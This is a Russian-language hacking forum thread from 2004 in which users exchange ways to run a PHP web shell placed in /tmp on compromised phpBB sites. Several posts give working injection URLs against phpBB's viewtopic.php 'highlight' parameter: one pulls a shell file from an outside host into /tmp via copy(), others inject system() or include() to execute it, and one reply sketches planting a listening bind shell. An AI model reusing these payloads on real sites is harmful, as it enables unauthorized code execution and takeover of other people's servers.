ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Если заливаю шелл в /tmp, смогу ли его запустить из браузера?
  #1  
Старый 25.12.2004, 18:06
Аватар для Placinta
Placinta
Новичок
Регистрация: 25.12.2004
Сообщений: 6
Провел на форуме:
43215

Репутация: 0
Question Если заливаю шелл в /tmp, смогу ли его запустить из браузера?

Я знаю что вех уже задолбал phpBB но я хочу коешто уточнить.
Говорят что на 90% компов папка /tmp открыта для записи.
Я верю но, даже если я залью шелл в /tmp, как я могу его запустить из браузера.
Жду ответов.
 
Ответить с цитированием

  #2  
Старый 26.12.2004, 00:13
Аватар для onyx3
onyx3
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Placinta  
Я знаю что вех уже задолбал phpBB но я хочу коешто уточнить.
Говорят что на 90% компов папка /tmp открыта для записи.
Я верю но, даже если я залью шелл в /tmp, как я могу его запустить из браузера.
Жду ответов.
Напиши плиззз комманду, которая зальёт этот шелл в твою папку..
 
Ответить с цитированием

  #3  
Старый 26.12.2004, 05:50
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию

никак. Шелл наао заливать в папку с самим сайтом. Хотя смотря какой шелл.
 
Ответить с цитированием

  #4  
Старый 26.12.2004, 12:05
Аватар для onyx3
onyx3
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0

Репутация: 0
По умолчанию

Ну вот ты какой коммандой залил свой шелл в папку /tmp ???
 
Ответить с цитированием

  #5  
Старый 26.12.2004, 12:32
Аватар для Placinta
Placinta
Новичок
Регистрация: 25.12.2004
Сообщений: 6
Провел на форуме:
43215

Репутация: 0
По умолчанию

Цитата:
Сообщение от kyzmi4  
никак. Шелл наао заливать в папку с самим сайтом. Хотя смотря какой шелл.
А какой шелл можно заливать не в папку с сайтом? Скажи имя, И если не жалко и его адрес.
 
Ответить с цитированием

  #6  
Старый 26.12.2004, 12:35
Аватар для Placinta
Placinta
Новичок
Регистрация: 25.12.2004
Сообщений: 6
Провел на форуме:
43215

Репутация: 0
По умолчанию

Цитата:
Сообщение от onyx3  
Ну вот ты какой коммандой залил свой шелл в папку /tmp ???
Вот такой.
viewtopic.php?a=http://seechat.fatal.ru/sql.hp&b=/tmp/remview.php&t=470&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527
 
Ответить с цитированием

  #7  
Старый 27.12.2004, 06:08
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию

если файл 1.php лежит в /tmp, то можешь запустить так
viewtopic.php?t=[topic]&highlight=%2527.system($_GET[cmd]).%2527&cmd=php /tmp/1.php
 
Ответить с цитированием

  #8  
Старый 28.12.2004, 13:54
Аватар для Placinta
Placinta
Новичок
Регистрация: 25.12.2004
Сообщений: 6
Провел на форуме:
43215

Репутация: 0
По умолчанию

Цитата:
Сообщение от LittleLamer  
если файл 1.php лежит в /tmp, то можешь запустить так
viewtopic.php?t=[topic]&highlight=%2527.system($_GET[cmd]).%2527&cmd=php /tmp/1.php
увы не получится. Там закрыт и shell и system()
 
Ответить с цитированием

  #9  
Старый 29.12.2004, 02:16
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию

viewtopic.php?t=[topic]&highlight=%2527.include($_GET[cmd]).%2527&cmd=/tmp/1.php
хотя не обязательно сработает, но попытка - не пытка =)
 
Ответить с цитированием

  #10  
Старый 31.12.2004, 03:03
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию

кароче обьясню на пальцах.
пример:
Ставим апаче.
Диск С это диск, который юзверь не видит. Папка html это папка откуда грузится сайт. Так вот если нужно что-бы веб-шелл грузил по такому методу http://bla-bla.ru/shell/shell.php то он должен быть залить в папку /html/shell/ а если ты зальеш выше папки html то ты его просто не откроеш
Случай 2.
Заливаем на диск С файл, который открывает на серваке порт и ждет команд, коннектимся к серву на этот порт и вот у нас шелл =)

ЗЫ Обьяснял на пальцах. Нимного не так. Если учесть что большинство серваков стоят на никсах и там нету диска С, но суть помойму высказал.

ЗЗЫ Многие серваки просто не пустят в папку /tmp =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
секреты и коды для сотовых телефонов ))) dinar_007 Сотовый фрикинг 32 05.08.2006 17:06
Прокси: Как вас вычислить если вы под анонимным прокси Geveres Статьи 0 19.11.2005 17:02
Как запустить PHP-файл на серваке если у него расширение не .php? bad_boy Форумы 13 13.11.2005 18:07
Война на передовой в условиях шаред хостинга на базе WHM/Cpanel/RHE w00d Чужие Статьи 1 12.07.2005 16:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ